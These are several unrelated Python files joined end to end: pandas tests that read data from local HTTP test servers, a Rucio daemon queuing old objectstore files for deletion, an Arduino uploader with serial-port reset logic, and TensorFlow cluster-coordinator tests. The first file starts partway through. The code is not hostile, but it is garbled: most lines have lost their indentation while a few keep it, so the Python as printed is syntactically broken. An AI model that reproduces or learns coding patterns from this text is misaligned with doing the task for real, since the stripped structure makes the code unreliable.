def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "application/json")
self.end_headers()
response_bytes = response_df.to_json().encode("utf-8")
self.write_back_bytes(response_bytes)
class GzippedJSONUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "application/json")
self.send_header("Content-Encoding", "gzip")
self.end_headers()
response_bytes = response_df.to_json().encode("utf-8")
response_bytes = self.gzip_bytes(response_bytes)
self.write_back_bytes(response_bytes)
class ParquetPyArrowUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
response_bytes = response_df.to_parquet(index=False, engine="pyarrow")
self.write_back_bytes(response_bytes)
class ParquetFastParquetUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
        # the fastparquet engine doesn't like to write to a buffer:
        # it can do so via the open_with hook, but fastparquet then calls the
        # close method and wipes the buffer, so write to an fsspec in-memory
        # filesystem instead and read the raw bytes back from there
# protected by an importorskip in the respective test
import fsspec
response_df.to_parquet(
"memory://fastparquet_user_agent.parquet",
index=False,
engine="fastparquet",
compression=None,
)
with fsspec.open("memory://fastparquet_user_agent.parquet", "rb") as f:
response_bytes = f.read()
self.write_back_bytes(response_bytes)
class PickleUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
bio = BytesIO()
response_df.to_pickle(bio)
response_bytes = bio.getvalue()
self.write_back_bytes(response_bytes)
class StataUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
bio = BytesIO()
response_df.to_stata(bio, write_index=False)
response_bytes = bio.getvalue()
self.write_back_bytes(response_bytes)
class AllHeaderCSVResponder(http.server.BaseHTTPRequestHandler):
"""
Send all request headers back for checking round trip
"""
def do_GET(self):
response_df = pd.DataFrame(self.headers.items())
self.send_response(200)
self.send_header("Content-Type", "text/csv")
self.end_headers()
response_bytes = response_df.to_csv(index=False).encode("utf-8")
self.wfile.write(response_bytes)
@pytest.mark.parametrize(
"responder, read_method, port, parquet_engine",
[
(CSVUserAgentResponder, pd.read_csv, 34259, None),
pytest.param(
JSONUserAgentResponder,
pd.read_json,
34260,
None,
marks=td.skip_array_manager_not_yet_implemented,
),
(ParquetPyArrowUserAgentResponder, pd.read_parquet, 34261, "pyarrow"),
(ParquetFastParquetUserAgentResponder, pd.read_parquet, 34262, "fastparquet"),
(PickleUserAgentResponder, pd.read_pickle, 34263, None),
(StataUserAgentResponder, pd.read_stata, 34264, None),
(GzippedCSVUserAgentResponder, pd.read_csv, 34265, None),
pytest.param(
GzippedJSONUserAgentResponder,
pd.read_json,
34266,
None,
marks=td.skip_array_manager_not_yet_implemented,
),
],
)
def test_server_and_default_headers(responder, read_method, port, parquet_engine):
if parquet_engine is not None:
pytest.importorskip(parquet_engine)
if parquet_engine == "fastparquet":
pytest.importorskip("fsspec")
server = http.server.HTTPServer(("localhost", port), responder)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
if parquet_engine is None:
df_http = read_method(f"http://localhost:{port}")
else:
df_http = read_method(f"http://localhost:{port}", engine=parquet_engine)
server.shutdown()
server.server_close()
server_thread.join()
assert not df_http.empty
@pytest.mark.parametrize(
"responder, read_method, port, parquet_engine",
[
(CSVUserAgentResponder, pd.read_csv, 34267, None),
pytest.param(
JSONUserAgentResponder,
pd.read_json,
34268,
None,
marks=td.skip_array_manager_not_yet_implemented,
),
(ParquetPyArrowUserAgentResponder, pd.read_parquet, 34269, "pyarrow"),
(ParquetFastParquetUserAgentResponder, pd.read_parquet, 34270, "fastparquet"),
(PickleUserAgentResponder, pd.read_pickle, 34271, None),
(StataUserAgentResponder, pd.read_stata, 34272, None),
(GzippedCSVUserAgentResponder, pd.read_csv, 34273, None),
pytest.param(
GzippedJSONUserAgentResponder,
pd.read_json,
34274,
None,
marks=td.skip_array_manager_not_yet_implemented,
),
],
)
def test_server_and_custom_headers(responder, read_method, port, parquet_engine):
if parquet_engine is not None:
pytest.importorskip(parquet_engine)
if parquet_engine == "fastparquet":
pytest.importorskip("fsspec")
custom_user_agent = "Super Cool One"
df_true = pd.DataFrame({"header": [custom_user_agent]})
server = http.server.HTTPServer(("localhost", port), responder)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
if parquet_engine is None:
df_http = read_method(
f"http://localhost:{port}",
storage_options={"User-Agent": custom_user_agent},
)
else:
df_http = read_method(
f"http://localhost:{port}",
storage_options={"User-Agent": custom_user_agent},
engine=parquet_engine,
)
server.shutdown()
server.server_close()
server_thread.join()
tm.assert_frame_equal(df_true, df_http)
@pytest.mark.parametrize(
"responder, read_method, port",
[
(AllHeaderCSVResponder, pd.read_csv, 34275),
],
)
def test_server_and_all_custom_headers(responder, read_method, port):
custom_user_agent = "Super Cool One"
custom_auth_token = "Super Secret One"
storage_options = {
"User-Agent": custom_user_agent,
"Auth": custom_auth_token,
}
server = http.server.HTTPServer(("localhost", port), responder)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
df_http = read_method(
f"http://localhost:{port}",
storage_options=storage_options,
)
server.shutdown()
server.server_close()
server_thread.join()
df_http = df_http[df_http["0"].isin(storage_options.keys())]
df_http = df_http.sort_values(["0"]).reset_index()
df_http = df_http[["0", "1"]]
keys = list(storage_options.keys())
df_true = pd.DataFrame({"0": keys, "1": [storage_options[k] for k in keys]})
df_true = df_true.sort_values(["0"])
df_true = df_true.reset_index().drop(["index"], axis=1)
tm.assert_frame_equal(df_true, df_http)
@pytest.mark.parametrize(
"engine",
[
"pyarrow",
"fastparquet",
],
)
def test_to_parquet_to_disk_with_storage_options(engine):
headers = {
"User-Agent": "custom",
"Auth": "other_custom",
}
pytest.importorskip(engine)
true_df = pd.DataFrame({"column_name": ["column_value"]})
msg = (
"storage_options passed with file object or non-fsspec file path|"
"storage_options passed with buffer, or non-supported URL"
)
with pytest.raises(ValueError, match=msg):
true_df.to_parquet("/tmp/junk.parquet", storage_options=headers, engine=engine)
|
os_injector.py
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Wen Guan, <wen.guan@cern.ch>, 2017
"""
OS injector is a daemon that lists objectstore (OS) files and injects them as temporary DIDs for deletion
"""
import datetime
import dateutil.parser
import hashlib
import logging
import os
import pytz
import random
import socket
import sys
import threading
import time
import traceback
from rucio.common.config import config_get
from rucio.core import rse as rse_core
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.temporary_did import (add_temporary_dids, get_count_of_expired_temporary_dids)
from rucio.rse import rsemanager as rsemgr
from rucio.daemons.reaper.reaper import __check_rse_usage
logging.getLogger("requests").setLevel(logging.CRITICAL)
logging.basicConfig(stream=sys.stdout,
level=getattr(logging, config_get('common', 'loglevel').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = threading.Event()
def inject(rse, older_than):
logging.info('Starting to inject objects for RSE: %s' % rse)
num_of_queued_dids = get_count_of_expired_temporary_dids(rse)
rse_id = rse_core.get_rse_id(rse)
if num_of_queued_dids < 1000:
max_being_deleted_files, needed_free_space, used, free = __check_rse_usage(rse=rse, rse_id=rse_id)
logging.info("needed_free_space: %s" % needed_free_space)
if needed_free_space is None or needed_free_space > 0:
rse_info = rsemgr.get_rse_info(rse)
for protocol in rse_info['protocols']:
protocol['impl'] = 'rucio.rse.protocols.s3boto.Default'
prot = rsemgr.create_protocol(rse_info, 'delete')
try:
prot.connect()
dids = []
older_than_time = datetime.datetime.utcnow() - datetime.timedelta(days=older_than)
older_than_time = older_than_time.replace(tzinfo=pytz.utc)
for key in prot.list():
d = dateutil.parser.parse(key.last_modified)
if d < older_than_time:
did = {'scope': 'transient',
'name': key.name.encode('utf-8'),
'rse': rse,
'rse_id': rse_id,
'bytes': key.size,
'created_at': d}
dids.append(did)
if len(dids) == 1000:
add_temporary_dids(dids=dids, account='root')
logging.info('Adding 1000 dids to temp dids.')
dids = []
                    else:
                        logging.info('Found an object newer than %s days; stop listing (objects in the OS are normally returned ordered by time)' % older_than)
                        break
                    if GRACEFUL_STOP.is_set():
                        logging.info('GRACEFUL_STOP is set. quit')
                        break
                if dids:
                    # flush any remaining (< 1000) expired objects so they are not silently dropped
                    add_temporary_dids(dids=dids, account='root')
                    logging.info('Adding %s remaining dids to temp dids.' % len(dids))
except:
logging.critical(traceback.format_exc())
else:
logging.info("Number of queued deletion for %s is %s, which is bigger than 1000. quit." % (rse, num_of_queued_dids))
def injector(rses=[], once=False, scheme=None, worker_number=0, total_workers=1, older_than=30, sleep_time=1):
"""
    Main loop to list objectstore files and inject them as temporary DIDs for deletion.
    :param rses: List of RSEs the injector should work against. If empty, it considers all RSEs.
    :param once: If True, only runs one iteration of the main loop.
    :param scheme: Force the injector to use a particular protocol, e.g., mock.
    :param worker_number: Index of this worker among total_workers.
    :param total_workers: Total number of workers.
    :param older_than: Only objects older than this number of days are listed and injected.
    :param sleep_time: Number of days to sleep between iterations.
"""
logging.info('Starting Light Injector %s-%s: Will work on RSEs: %s', worker_number, total_workers, str(rses))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
    hash_executable = hashlib.sha256((sys.argv[0] + ''.join(rses)).encode()).hexdigest()
sanity_check(executable=None, hostname=hostname)
injecting_time = time.time()
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Light Injector({0[worker_number]}/{0[total_workers]}): Live gives {0[heartbeat]}'.format(locals()))
nothing_to_do = True
random.shuffle(rses)
for rse in rses:
inject(rse, older_than)
if once:
break
            next_inject_time = time.time() + 3600 * 24 * sleep_time  # schedule relative to now so later iterations still sleep
logging.info('Will sleep %s seconds(about %s days)' % (next_inject_time - time.time(), (next_inject_time - time.time()) * 1.0 / 86400))
while not GRACEFUL_STOP.is_set() and time.time() < next_inject_time:
time.sleep(1)
except:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(one_worker_per_rse=False, once=False, rses=[], scheme=None, all_os_rses=False, older_than=30, sleep_time=1):
"""
Starts up the injector threads.
:param one_worker_per_rse: If True, one worker per RSE; Otherwise, one worker for all RSEs.
:param once: If True, only runs one iteration of the main loop.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
:param all_os_rses: All Objectstore RSEs.
:param older_than: List control: older objects more than this value of days to list.
:param sleep_time: Days to sleep.
"""
logging.info('main: starting processes')
if all_os_rses:
rses = []
for rse in rse_core.list_rses():
if rse['rse'].endswith('_ES'):
rses.append(rse['rse'])
threads = []
if one_worker_per_rse:
worker = 0
for rse in rses:
kwargs = {'once': once, 'rses': [rse], 'scheme': scheme, 'worker_number': worker, 'total_workers': len(rses),
'older_than': older_than, 'sleep_time': sleep_time}
threads.append(threading.Thread(target=injector, kwargs=kwargs, name='Worker: %s, Total_Workers: %s' % (worker, len(rses))))
worker += 1
else:
kwargs = {'once': once, 'rses': rses, 'scheme': scheme, 'older_than': older_than, 'sleep_time': sleep_time}
threads.append(threading.Thread(target=injector, kwargs=kwargs, name='Worker: %s, Total_Workers: %s' % (0, 1)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
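# Illustrative wiring only (the launcher script is assumed and not part of this
# module): a typical entry point would register stop() for termination signals
# and then call run(), e.g.
#
#   import signal
#   signal.signal(signal.SIGTERM, stop)
#   run(all_os_rses=True, older_than=30, sleep_time=1)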
|
uploader.py
|
#-*- coding: utf-8 -*-
# stino/uploader.py
import threading
import time
from . import constant
from . import compiler
from . import console
from . import serial
from . import pyserial
class Uploader:
def __init__(self, args, cur_compiler, mode = 'upload'):
self.args = args.getArgs()
self.mode = mode
self.compiler = cur_compiler
self.command_list = []
self.output_console = cur_compiler.getOutputConsole()
self.no_error = True
upload_command_text = ''
if mode == 'upload':
if 'upload.pattern' in self.args:
upload_command_text = self.args['upload.pattern']
elif mode == 'programmer':
if 'program.pattern' in self.args:
upload_command_text = self.args['program.pattern']
if upload_command_text:
upload_command = compiler.Command(upload_command_text)
upload_command.setOutputText('Uploading...\n')
self.command_list.append(upload_command)
if 'reboot.pattern' in self.args:
reboot_command_text = self.args['reboot.pattern']
reboot_command = compiler.Command(reboot_command_text)
self.command_list.append(reboot_command)
def run(self):
if self.command_list:
upload_thread = threading.Thread(target=self.upload)
upload_thread.start()
else:
self.no_error = False
def upload(self):
while not self.compiler.isFinished():
time.sleep(0.5)
if not self.compiler.noError():
return
serial_port = serial.getSelectedSerialPort()
serial_monitor = None
if serial_port in constant.serial_in_use_list:
serial_monitor = constant.serial_monitor_dict[serial_port]
serial_monitor.stop()
force_to_reset = False
if self.mode == 'upload':
if 'bootloader.file' in self.args:
if 'caterina' in self.args['bootloader.file'].lower():
force_to_reset = True
elif self.args.get('upload.use_1200bps_touch', 'false') == 'true':
force_to_reset = True
        pre_serial_port = serial_port
        if force_to_reset:
wait_for_upload_port = self.args.get('upload.wait_for_upload_port', 'false') == 'true'
serial_port = resetSerial(pre_serial_port, self.output_console, wait_for_upload_port)
if self.args['cmd'] != 'avrdude':
if serial_port.startswith('/dev/'):
serial_port = serial_port[5:]
if serial_port:
for cur_command in self.command_list:
command_text = cur_command.getCommand()
command_text = command_text.replace(pre_serial_port, serial_port)
cur_command.setCommand(command_text)
for cur_command in self.command_list:
return_code = cur_command.run(self.output_console)
if return_code > 0:
self.output_console.printText('[Stino - Error %d]\n' % return_code)
self.no_error = False
break
if self.no_error:
self.output_console.printText('[Stino - Done uploading.]\n')
if force_to_reset:
time.sleep(5)
if serial_monitor:
serial_monitor.start()
def touchSerialPort(serial_port, baudrate):
cur_serial = pyserial.Serial()
cur_serial.port = serial_port
cur_serial.baudrate = baudrate
cur_serial.bytesize = pyserial.EIGHTBITS
cur_serial.stopbits = pyserial.STOPBITS_ONE
cur_serial.parity = pyserial.PARITY_NONE
cur_serial.open()
cur_serial.close()
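# Usage note (illustrative): opening and closing the port at 1200 baud is what
# triggers the auto-reset on Caterina-based boards, e.g.
#
#   touchSerialPort('/dev/ttyACM0', 1200)   # the port name here is an example only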
def resetSerial(serial_port, output_console, wait_for_upload_port):
show_upload_output = constant.sketch_settings.get('show_upload_output', False)
caterina_serial_port = ''
before_serial_list = serial.getSerialPortList()
if serial_port in before_serial_list:
non_serial_list = before_serial_list[:]
non_serial_list.remove(serial_port)
if show_upload_output:
msg = 'Forcing reset using 1200bps open/close on port %s.\n' % serial_port
output_console.printText(msg)
touchSerialPort(serial_port, 1200)
if not wait_for_upload_port:
time.sleep(0.4)
return serial_port
# Scanning for available ports seems to open the port or
# otherwise assert DTR, which would cancel the WDT reset if
# it happened within 250 ms. So we wait until the reset should
        # have already occurred before we start scanning.
if constant.sys_platform == 'windows':
time.sleep(3)
else:
time.sleep(0.3)
# Wait for a port to appear on the list
elapsed = 0
while (elapsed < 10000):
now_serial_list = serial.getSerialPortList()
diff_serial_list = diffList(now_serial_list, non_serial_list)
if show_upload_output:
msg = 'Ports {%s}/{%s} => {%s}\n' % (before_serial_list, now_serial_list,
diff_serial_list)
output_console.printText(msg)
if len(diff_serial_list) > 0:
caterina_serial_port = diff_serial_list[0]
if show_upload_output:
msg = 'Found new upload port: %s.\n' % caterina_serial_port
output_console.printText(msg)
break
# Keep track of port that disappears
# before_serial_list = now_serial_list
time.sleep(0.25)
elapsed += 250
# On Windows, it can take a long time for the port to disappear and
# come back, so use a longer time out before assuming that the selected
# port is the bootloader (not the sketch).
if (((constant.sys_platform != 'windows' and elapsed >= 500)
or elapsed >= 5000) and (serial_port in now_serial_list)):
if show_upload_output:
msg = 'Uploading using selected port: %s.\n' % serial_port
output_console.printText(msg)
caterina_serial_port = serial_port
break
if not caterina_serial_port:
msg = 'Couldn\'t find a Leonardo on the selected port.\nCheck that you have the correct port selected.\nIf it is correct, try pressing the board\'s reset button after initiating the upload.\n'
output_console.printText(msg)
return caterina_serial_port
class Bootloader:
def __init__(self, cur_project, args):
self.args = args.getArgs()
erase_command_text = self.args['erase.pattern']
burn_command_text = self.args['bootloader.pattern']
erase_command = compiler.Command(erase_command_text)
burn_command = compiler.Command(burn_command_text)
self.command_list = [erase_command, burn_command]
self.output_console = console.Console(cur_project.getName())
def start(self):
upload_thread = threading.Thread(target=self.burn)
upload_thread.start()
def burn(self):
for cur_command in self.command_list:
return_code = cur_command.run(self.output_console)
if return_code > 0:
self.output_console.printText('[Error %d]\n' % return_code)
break
def diffList(now_list, before_list):
    diff_list = now_list[:]  # copy so the caller's list is not mutated
for before_item in before_list:
if before_item in diff_list:
diff_list.remove(before_item)
return diff_list
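# Example (illustrative; not called anywhere in this module): detecting the
# port that appeared after a 1200bps touch reset.
#
#   diffList(['COM3', 'COM7'], ['COM3'])  ->  ['COM7']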
|
cluster_coordinator_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for coordinator.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import contextlib
import functools
import os
import platform
import sys
import threading
import time
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import distribute_utils
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.distribute import input_lib
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import parameter_server_strategy_v2
from tensorflow.python.distribute.cluster_resolver import SimpleClusterResolver
from tensorflow.python.distribute.coordinator import cluster_coordinator as coordinator_lib
from tensorflow.python.distribute.coordinator import values as values_lib
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import coordinator
from tensorflow.python.training.server_lib import ClusterSpec
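# The tests below exercise the producer/consumer contract of
# coordinator_lib._CoordinatedClosureQueue. A rough sketch of that contract,
# using only methods that appear in these tests:
#
#   queue = coordinator_lib._CoordinatedClosureQueue()
#   queue.put(closure)        # producer side
#   closure = queue.get()     # a worker takes ownership
#   queue.mark_finished()     # ...or queue.mark_failed(exc) / queue.put_back(closure)
#   queue.wait()              # blocks until all inflight closures settle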
class CoordinatedClosureQueueTest(test.TestCase):
def testBasic(self):
queue = coordinator_lib._CoordinatedClosureQueue()
closure1 = self._create_closure(queue._cancellation_mgr)
queue.put(closure1)
self.assertIs(closure1, queue.get())
self.assertFalse(queue.done())
queue.put_back(closure1)
self.assertEqual(closure1, queue.get())
queue.mark_finished()
self.assertTrue(queue.done())
queue.wait()
  def testProcessAtLeastOnce(self):
closure_queue = coordinator_lib._CoordinatedClosureQueue()
labels = ['A', 'B', 'C', 'D', 'E']
processed_count = collections.defaultdict(int)
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def process_queue():
with coord.stop_on_exception():
has_been_put_back = False
while True:
closure = closure_queue.get(timeout=30)
if closure is None:
break
if not has_been_put_back:
has_been_put_back = True
closure_queue.put_back(closure)
continue
closure._function()
closure_queue.mark_finished()
def get_func(label):
def func():
time.sleep(3)
processed_count[label] += 1
return func
cm = cancellation.CancellationManager()
for label in labels:
closure_queue.put(coordinator_lib.Closure(get_func(label), cm))
t1 = threading.Thread(target=process_queue, daemon=True)
t1.start()
t2 = threading.Thread(target=process_queue, daemon=True)
t2.start()
# Make sure multiple wait() calls are fine.
closure_queue.wait()
closure_queue.wait()
closure_queue.wait()
closure_queue.wait()
self.assertEqual(processed_count, collections.Counter(labels))
coord.join([t1, t2])
def testNotifyBeforeWait(self):
closure_queue = coordinator_lib._CoordinatedClosureQueue()
def func():
logging.info('func running')
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def process_queue():
with coord.stop_on_exception():
closure_queue.get()
closure_queue.mark_finished()
closure_queue.put(
coordinator_lib.Closure(func, closure_queue._cancellation_mgr))
t = threading.Thread(target=process_queue)
t.start()
coord.join([t])
# This test asserts that waiting at the time the function has been processed
# doesn't time out.
closure_queue.wait()
def _assert_one_unblock_the_other(self, first_fn, second_fn):
"""Asserts `second_fn` wouldn't return before `first_fn` is finished."""
first_fn_done = threading.Event()
second_fn_done = threading.Event()
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def wrapped_first_fn():
with coord.stop_on_exception():
self.assertFalse(second_fn_done.is_set())
first_fn()
first_fn_done.set()
self.assertFalse(first_fn_done.is_set())
t = threading.Thread(target=wrapped_first_fn)
t.start()
second_fn()
self.assertTrue(first_fn_done.is_set())
second_fn_done.set()
coord.join([t])
def testWaitRaiseErrorAfterMarkFailure(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue = coordinator_lib._CoordinatedClosureQueue()
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
closure = closure_queue.get()
wait_finish_event = threading.Event()
coord = coordinator.Coordinator(clean_stop_exception_types=[])
# Using a thread to verify that closure_queue.wait() will not return until
# all inflight closures are finished.
def mark_finished_fn():
try:
raise ValueError('Some error.')
except ValueError as e:
closure_queue.mark_failed(e)
def wait_fn():
with self.assertRaises(ValueError):
closure_queue.wait()
self._assert_one_unblock_the_other(mark_finished_fn, wait_fn)
self.assertTrue(closure_queue.done())
def _create_closure(self, cancellation_mgr):
@def_function.function()
def some_function():
return 1.0
return coordinator_lib.Closure(some_function, cancellation_mgr)
def _put_two_closures_and_get_one(self):
closure_queue = coordinator_lib._CoordinatedClosureQueue()
closure1 = self._create_closure(closure_queue._cancellation_mgr)
closure_queue.put(closure1)
closure2 = self._create_closure(closure_queue._cancellation_mgr)
closure_queue.put(closure2)
closure_got = closure_queue.get() # returns closure1
self.assertIs(closure_got, closure1)
self.assertIsNot(closure_got, closure2)
return closure_queue, closure1, closure2
def testPutRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, closure2 = self._put_two_closures_and_get_one()
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
self.assertTrue(closure_queue.done())
with self.assertRaisesRegex(
errors.CancelledError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure2.output_remote_value.fetch()
# The error is cleared.
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
def testWaitRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, closure2 = self._put_two_closures_and_get_one()
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.wait()
self.assertTrue(closure_queue.done())
with self.assertRaisesRegex(
errors.CancelledError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure2.output_remote_value.fetch()
# The error is cleared.
closure_queue.wait()
def testDoneRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, _ = self._put_two_closures_and_get_one()
self.assertFalse(closure_queue.done())
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.done()
def _set_error(self, closure_queue, closure, error):
try:
raise error
except Exception as e: # pylint: disable=broad-except
closure.output_remote_value._set_error(e)
closure_queue.mark_failed(e)
def _test_cancel_closure_when_error(self, call_wait):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, closure1, closure2 = self._put_two_closures_and_get_one()
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
closure_queue.get()
# At this moment, there are two inflight, one in queue.
self.assertEqual(closure_queue._inflight_closure_count, 2)
# Hold a copy of the queue's cancellation manager at this point
initial_cm = closure_queue._cancellation_mgr
# Simulating closure1 fails.
self._set_error(closure_queue, closure1, ValueError('Some error.'))
    # At this moment, there is one inflight, one in queue.
self.assertEqual(closure_queue._queue.qsize(), 1)
self.assertEqual(closure_queue._inflight_closure_count, 1)
closure3 = self._create_closure(closure_queue._cancellation_mgr)
def fake_cancellation():
self._set_error(closure_queue, closure2,
ValueError('Fake cancellation error.'))
def report_error():
# It should not report the fake cancellation error.
with self.assertRaisesRegex(ValueError, 'Some error.'):
# Verifying `wait()` or `put()` raises even if one closure is in
# flight.
if call_wait:
closure_queue.wait()
else:
closure_queue.put(closure3)
self._assert_one_unblock_the_other(fake_cancellation, report_error)
# The original cancellation manager of the queue has been cancelled.
self.assertTrue(initial_cm.is_cancelled)
# At this moment, there is zero inflight, nothing in queue.
self.assertTrue(closure_queue._queue.empty())
self.assertEqual(closure_queue._inflight_closure_count, 0)
self.assertIsNone(closure_queue._error)
# This asserts that closure1 has errored.
with self.assertRaisesRegex(ValueError, 'Some error.'):
closure1.output_remote_value.fetch()
# The following asserts that closure3 should have been cancelled.
if not call_wait:
with self.assertRaisesRegex(
errors.CancelledError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure3.output_remote_value.fetch()
# Closure2 was an inflight closure when it got cancelled.
self.assertEqual(closure2.output_remote_value._status,
values_lib.RemoteValueStatus.READY)
with self.assertRaisesRegex(ValueError, 'Fake cancellation error.'):
closure2.output_remote_value.fetch()
# This asserts that the queue has a clear state.
self.testBasic()
def testWaitRaiseErrorAfterCancelClosure(self):
self._test_cancel_closure_when_error(call_wait=True)
def testPutRaiseErrorAfterCancelClosure(self):
self._test_cancel_closure_when_error(call_wait=False)
def testStateIsRestoredAfterJoinIsCalled(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, _ = self._put_two_closures_and_get_one()
self.assertEqual(closure_queue._inflight_closure_count, 1)
closure_queue.mark_failed(ValueError('test error'))
with self.assertRaises(ValueError):
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
# Its error should have been cleared.
self.assertIsNone(closure_queue._error)
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
self.assertIsNone(closure_queue._error)
  def testThreadSafety(self):
thread_count = 10
queue = coordinator_lib._CoordinatedClosureQueue()
# Each thread performs 20 queue actions: 10 are `put_back` and 10 are
# `mark_finished`.
action_count = 20
def func():
for i in range(action_count):
closure = queue.get()
if i % 2 == 0:
queue.put_back(closure)
else:
queue.mark_finished()
threads = [threading.Thread(target=func) for i in range(thread_count)]
for t in threads:
t.start()
for _ in range(thread_count * action_count // 2):
queue.put(self._create_closure(queue._cancellation_mgr))
queue.wait()
self.assertTrue(queue.done())
class ErrorReportingThread(threading.Thread):
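  """A Thread subclass that records exceptions raised in its target.
  The exception is stored on the class so that
  TestCaseWithErrorReportingThread.tearDown can re-raise it in the main
  thread, making worker-thread failures visible to the test runner.
  """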
error = None
def __init__(self, *args, **kwargs):
assert 'target' in kwargs
target = kwargs['target']
@functools.wraps(target)
def wrapped_target(*args, **kwargs):
try:
return target(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
ErrorReportingThread.error = e
kwargs['target'] = wrapped_target
super(ErrorReportingThread, self).__init__(*args, **kwargs)
class TestCaseWithErrorReportingThread(test.TestCase):
@classmethod
def setUpClass(cls):
cls._threading_thread = threading.Thread
threading.Thread = ErrorReportingThread
super(TestCaseWithErrorReportingThread, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(TestCaseWithErrorReportingThread, cls).tearDownClass()
threading.Thread = cls._threading_thread
def setUp(self):
ErrorReportingThread.error = None
super(TestCaseWithErrorReportingThread, self).setUp()
def tearDown(self):
super(TestCaseWithErrorReportingThread, self).tearDown()
if ErrorReportingThread.error:
raise ErrorReportingThread.error # pylint: disable=raising-bad-type
def make_coordinator(num_workers, num_ps):
# TODO(rchao): Test the internal rpc_layer version.
cluster_def = multi_worker_test_base.create_in_process_cluster(
num_workers=num_workers, num_ps=num_ps, rpc_layer='grpc')
cluster_def['chief'] = [
'localhost:%d' % multi_worker_test_base.pick_unused_port()
]
cluster_resolver = SimpleClusterResolver(
ClusterSpec(cluster_def), rpc_layer='grpc')
strategy = parameter_server_strategy_v2.ParameterServerStrategyV2(
cluster_resolver)
return coordinator_lib.ClusterCoordinator(strategy)
